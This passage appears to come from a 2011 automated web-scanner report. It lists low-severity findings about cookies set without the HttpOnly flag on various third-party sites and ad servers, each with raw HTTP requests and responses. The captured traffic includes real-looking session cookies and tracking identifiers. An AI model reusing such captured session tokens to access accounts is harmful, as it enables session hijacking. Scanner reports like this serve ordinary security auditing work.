Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 12:15:25 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Location: http://t5.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=https%3A%2F%2Fwww%2Emanageengine%2Ecom%2Fnetwork%2Dperformance%2Dmanagement%2Ehtml; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSATDSTDS=GNAEFPICCPFPBHIMPOCEICLB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t5.trackalyzer.com/dot.gif">here</a>.</body>

16.32. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3-2
Set-Cookie: PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/
Vary: Accept-Encoding
Content-Length: 32979

<!DOCTYPE html>
<html>
<head>
<title>Tengrinews.kz : .............. .................... .... ..............</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta
...[SNIP]...

16.33. http://www.fusionvm.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fusionvm.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fusionvm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 154
Content-Type: text/html
Location: https://www.fusionvm.com/FusionVM
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQQASDQQ=NNOLHEFCAHOOGAAPGKOENPGL; path=/
Date: Mon, 25 Apr 2011 12:54:47 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.fusionvm.com/FusionVM">here</a>.</body>

16.34. http://www.gartner.com/technology/contact/contact_gartner.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/contact/contact_gartner.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>


<!-- Changes to title and meta tags
...[SNIP]...

16.35. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...

16.36. http://www.netsuite.com/app/site/hit/tracker.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /app/site/hit/tracker.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/hit/tracker.nl?c=NLCORP&n=1&type=page&siteroot=live_6_23_05&url=portal%2Fpage_not_found.shtml&referer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; mbox=session#1303736347554-914602#1303744312|PC#1303736347554-914602.17#1366814452|check#true#1303742512; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.1.10.1303742452

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: 2009164861:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 15:13:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=5mXTN1PVw6dygQkdTVTmXQgT7Cs1LMQ7tWgfgqb1Rp1BX437XsxLy1dTQm6Xd61SYY2ZsXLhQkmy4d23GShKhWWrGHXSJJFCxR51kXMRQWvG7LddhvNGGGnyWDf82cDj!-2139436563; path=/
Set-Cookie: NLVisitorId=rcHW85B5AVBeOVDe; domain=www.netsuite.com; expires=Sunday, 15-Apr-2012 15:13:57 GMT; path=/
Set-Cookie: NLShopperId=rcHW85B5AVReOThy; domain=www.netsuite.com; expires=Monday, 02-May-2011 15:13:57 GMT; path=/


16.37. http://www.smpone.com/images/captcha.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /images/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/captcha.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733901

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=b07217b91d15829f50a400a4c700d48f; path=/
Content-Type: image/jpeg
Content-Length: 5320

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

16.38. http://www.tresware.com/images/captcha.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /images/captcha.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/captcha.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303734004

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2629f9017c7f7d7f31d4a3886871e1e7; path=/
Content-Type: image/jpeg
Content-Length: 5090

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

16.39. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...

16.40. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

16.41. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...

16.42. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6sn9=dlx%3A6ot5%3A1; rth=2-ljzkpb-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:01 GMT
Connection: close
Set-Cookie: T_6sn9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

16.43. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9xbg=eo7%3A85ej%3A1; rth=2-ljzkpb-eo7~85ej~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:11 GMT
Connection: close
Set-Cookie: T_9xbg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

16.44. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
